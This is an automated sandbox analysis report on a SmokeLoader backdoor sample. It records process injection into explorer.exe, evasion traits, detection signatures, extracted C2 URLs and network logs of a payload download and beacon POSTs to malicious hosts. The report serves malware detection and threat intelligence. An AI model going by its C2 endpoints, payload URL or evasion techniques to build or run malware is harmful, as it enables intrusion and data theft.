Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BzLGqYKy7o.exe

Overview

General Information

Sample name:BzLGqYKy7o.exe
renamed because original name is a hash value
Original sample name:d0d4805488e7e745515fff2165d3cc05.exe
Analysis ID:1528058
MD5:d0d4805488e7e745515fff2165d3cc05
SHA1:0cebec529de0430c9e897f740700b27c043a8552
SHA256:e684bed5b84f09dd85a88a7847fb4aaed9845f9b8098f0dda486a095a3115d4c
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BzLGqYKy7o.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\BzLGqYKy7o.exe" MD5: D0D4805488E7E745515FFF2165D3CC05)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • B9A0.exe (PID: 6768 cmdline: C:\Users\user\AppData\Local\Temp\B9A0.exe MD5: 0719C6940AABCC832DB40F7EE68A25DC)
  • teihrdr (PID: 6460 cmdline: C:\Users\user\AppData\Roaming\teihrdr MD5: D0D4805488E7E745515FFF2165D3CC05)
  • teihrdr (PID: 1992 cmdline: C:\Users\user\AppData\Roaming\teihrdr MD5: D0D4805488E7E745515FFF2165D3CC05)
  • jtihrdr (PID: 7108 cmdline: C:\Users\user\AppData\Roaming\jtihrdr MD5: 0719C6940AABCC832DB40F7EE68A25DC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x121a2:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1296a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.jtihrdr.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        9.3.jtihrdr.530000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          7.2.B9A0.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            7.3.B9A0.exe.20c0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              7.2.B9A0.exe.1fa0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 1 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\teihrdr, CommandLine: C:\Users\user\AppData\Roaming\teihrdr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\teihrdr, NewProcessName: C:\Users\user\AppData\Roaming\teihrdr, OriginalFileName: C:\Users\user\AppData\Roaming\teihrdr, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\teihrdr, ProcessId: 6460, ProcessName: teihrdr

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:59:24.450425+020020391031A Network Trojan was detected192.168.2.549770105.197.97.24780TCP
                2024-10-07T14:59:25.374466+020020391031A Network Trojan was detected192.168.2.549776105.197.97.24780TCP
                2024-10-07T14:59:26.314240+020020391031A Network Trojan was detected192.168.2.549782105.197.97.24780TCP
                2024-10-07T14:59:27.265046+020020391031A Network Trojan was detected192.168.2.549788105.197.97.24780TCP
                2024-10-07T14:59:28.193590+020020391031A Network Trojan was detected192.168.2.549794105.197.97.24780TCP
                2024-10-07T14:59:29.130090+020020391031A Network Trojan was detected192.168.2.549804105.197.97.24780TCP
                2024-10-07T14:59:30.253391+020020391031A Network Trojan was detected192.168.2.549810105.197.97.24780TCP
                2024-10-07T14:59:31.176635+020020391031A Network Trojan was detected192.168.2.549814105.197.97.24780TCP
                2024-10-07T14:59:32.219133+020020391031A Network Trojan was detected192.168.2.549822105.197.97.24780TCP
                2024-10-07T14:59:33.173977+020020391031A Network Trojan was detected192.168.2.549831105.197.97.24780TCP
                2024-10-07T14:59:34.105790+020020391031A Network Trojan was detected192.168.2.549837105.197.97.24780TCP
                2024-10-07T14:59:35.044145+020020391031A Network Trojan was detected192.168.2.549844105.197.97.24780TCP
                2024-10-07T14:59:35.980167+020020391031A Network Trojan was detected192.168.2.549850105.197.97.24780TCP
                2024-10-07T14:59:37.313136+020020391031A Network Trojan was detected192.168.2.549856105.197.97.24780TCP
                2024-10-07T14:59:38.356354+020020391031A Network Trojan was detected192.168.2.549867105.197.97.24780TCP
                2024-10-07T14:59:39.269702+020020391031A Network Trojan was detected192.168.2.549868105.197.97.24780TCP
                2024-10-07T14:59:40.231913+020020391031A Network Trojan was detected192.168.2.549874105.197.97.24780TCP
                2024-10-07T14:59:41.192149+020020391031A Network Trojan was detected192.168.2.549885105.197.97.24780TCP
                2024-10-07T14:59:42.137608+020020391031A Network Trojan was detected192.168.2.549891105.197.97.24780TCP
                2024-10-07T14:59:43.085742+020020391031A Network Trojan was detected192.168.2.549897105.197.97.24780TCP
                2024-10-07T14:59:44.028780+020020391031A Network Trojan was detected192.168.2.549903105.197.97.24780TCP
                2024-10-07T14:59:44.972761+020020391031A Network Trojan was detected192.168.2.549910105.197.97.24780TCP
                2024-10-07T14:59:45.907705+020020391031A Network Trojan was detected192.168.2.549916105.197.97.24780TCP
                2024-10-07T14:59:47.047276+020020391031A Network Trojan was detected192.168.2.549922105.197.97.24780TCP
                2024-10-07T14:59:49.566919+020020391031A Network Trojan was detected192.168.2.549939105.197.97.24780TCP
                2024-10-07T14:59:50.521037+020020391031A Network Trojan was detected192.168.2.549945105.197.97.24780TCP
                2024-10-07T14:59:51.497852+020020391031A Network Trojan was detected192.168.2.549952105.197.97.24780TCP
                2024-10-07T14:59:52.661203+020020391031A Network Trojan was detected192.168.2.549961105.197.97.24780TCP
                2024-10-07T14:59:53.588010+020020391031A Network Trojan was detected192.168.2.549969105.197.97.24780TCP
                2024-10-07T14:59:54.529610+020020391031A Network Trojan was detected192.168.2.549975105.197.97.24780TCP
                2024-10-07T14:59:56.016097+020020391031A Network Trojan was detected192.168.2.549979105.197.97.24780TCP
                2024-10-07T14:59:57.166667+020020391031A Network Trojan was detected192.168.2.549982105.197.97.24780TCP
                2024-10-07T14:59:58.325335+020020391031A Network Trojan was detected192.168.2.549993105.197.97.24780TCP
                2024-10-07T14:59:59.253273+020020391031A Network Trojan was detected192.168.2.549998105.197.97.24780TCP
                2024-10-07T15:00:14.419801+020020391031A Network Trojan was detected192.168.2.550012188.40.141.211443TCP
                2024-10-07T15:00:16.825302+020020391031A Network Trojan was detected192.168.2.550013188.40.141.211443TCP
                2024-10-07T15:01:05.953100+020020391031A Network Trojan was detected192.168.2.550014105.197.97.24780TCP
                2024-10-07T15:01:15.348447+020020391031A Network Trojan was detected192.168.2.550015105.197.97.24780TCP
                2024-10-07T15:01:27.089587+020020391031A Network Trojan was detected192.168.2.550016105.197.97.24780TCP
                2024-10-07T15:01:32.047885+020020391031A Network Trojan was detected192.168.2.550017188.40.141.211443TCP
                2024-10-07T15:01:33.047947+020020391031A Network Trojan was detected192.168.2.550018188.40.141.211443TCP
                2024-10-07T15:01:46.179545+020020391031A Network Trojan was detected192.168.2.550019105.197.97.24780TCP
                2024-10-07T15:01:54.998397+020020391031A Network Trojan was detected192.168.2.550020188.40.141.211443TCP
                2024-10-07T15:01:56.212271+020020391031A Network Trojan was detected192.168.2.550021188.40.141.211443TCP
                2024-10-07T15:02:07.860198+020020391031A Network Trojan was detected192.168.2.550022189.195.132.13480TCP
                2024-10-07T15:02:16.720307+020020391031A Network Trojan was detected192.168.2.550023188.40.141.211443TCP
                2024-10-07T15:02:17.696520+020020391031A Network Trojan was detected192.168.2.550024188.40.141.211443TCP
                2024-10-07T15:02:29.863734+020020391031A Network Trojan was detected192.168.2.550025189.195.132.13480TCP
                2024-10-07T15:02:39.765694+020020391031A Network Trojan was detected192.168.2.550026188.40.141.211443TCP
                2024-10-07T15:02:40.760206+020020391031A Network Trojan was detected192.168.2.550027188.40.141.211443TCP
                2024-10-07T15:02:50.926729+020020391031A Network Trojan was detected192.168.2.550028189.195.132.13480TCP
                2024-10-07T15:03:02.556191+020020391031A Network Trojan was detected192.168.2.550029188.40.141.211443TCP
                2024-10-07T15:03:03.522877+020020391031A Network Trojan was detected192.168.2.550030188.40.141.211443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T15:00:14.715498+020028098821Malware Command and Control Activity Detected192.168.2.550012188.40.141.211443TCP
                2024-10-07T15:00:18.334781+020028098821Malware Command and Control Activity Detected192.168.2.550013188.40.141.211443TCP
                2024-10-07T15:01:32.309002+020028098821Malware Command and Control Activity Detected192.168.2.550017188.40.141.211443TCP
                2024-10-07T15:01:33.325361+020028098821Malware Command and Control Activity Detected192.168.2.550018188.40.141.211443TCP
                2024-10-07T15:01:55.268074+020028098821Malware Command and Control Activity Detected192.168.2.550020188.40.141.211443TCP
                2024-10-07T15:01:56.460168+020028098821Malware Command and Control Activity Detected192.168.2.550021188.40.141.211443TCP
                2024-10-07T15:02:17.024280+020028098821Malware Command and Control Activity Detected192.168.2.550023188.40.141.211443TCP
                2024-10-07T15:02:18.001733+020028098821Malware Command and Control Activity Detected192.168.2.550024188.40.141.211443TCP
                2024-10-07T15:02:40.046670+020028098821Malware Command and Control Activity Detected192.168.2.550026188.40.141.211443TCP
                2024-10-07T15:02:41.069076+020028098821Malware Command and Control Activity Detected192.168.2.550027188.40.141.211443TCP
                2024-10-07T15:03:02.864372+020028098821Malware Command and Control Activity Detected192.168.2.550029188.40.141.211443TCP
                2024-10-07T15:03:03.824257+020028098821Malware Command and Control Activity Detected192.168.2.550030188.40.141.211443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: BzLGqYKy7o.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\teihrdrAvira: detection malicious, Label: HEUR/AGEN.1310247
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeAvira: detection malicious, Label: HEUR/AGEN.1310247
                Source: C:\Users\user\AppData\Roaming\jtihrdrAvira: detection malicious, Label: HEUR/AGEN.1310247
                Found malware configuration
                Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\teihrdrReversingLabs: Detection: 31%
                Multi AV Scanner detection for submitted file
                Source: BzLGqYKy7o.exeReversingLabs: Detection: 31%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\teihrdrJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\jtihrdrJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: BzLGqYKy7o.exeJoe Sandbox ML: detected
                Source: BzLGqYKy7o.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50012 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50013 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50017 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50018 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50020 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50021 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50023 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50024 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50026 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50027 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50029 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50030 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49804 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49782 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49810 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49814 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49770 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49788 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49822 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49868 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49850 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49776 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49885 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49844 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49903 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49837 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49831 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49856 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49867 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49794 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49897 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49945 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49874 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49952 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49993 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50028 -> 189.195.132.134:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49982 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49979 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49969 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50022 -> 189.195.132.134:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50019 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49910 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49916 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49975 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50025 -> 189.195.132.134:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49891 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49922 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49939 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49961 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49998 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50024 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50021 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50024 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50021 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50023 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50017 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50023 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50013 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50018 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50020 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50026 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50020 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50026 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50012 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50027 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50027 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50029 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50029 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50030 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50030 -> 188.40.141.211:443
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 105.197.97.247 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 189.195.132.134 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: RAYA-ASEG RAYA-ASEG
                Source: Joe Sandbox ViewASN Name: MegaCableSAdeCVMX MegaCableSAdeCVMX
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://qchnpedxxogxdjn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://oqqsbiatqglrn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: bestworldhools.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xoybtutnnxkecaqf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://cqxtjrqcgsayay.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: bestworldhools.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://nihavgqtcpkgtcxt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: calvinandhalls.com
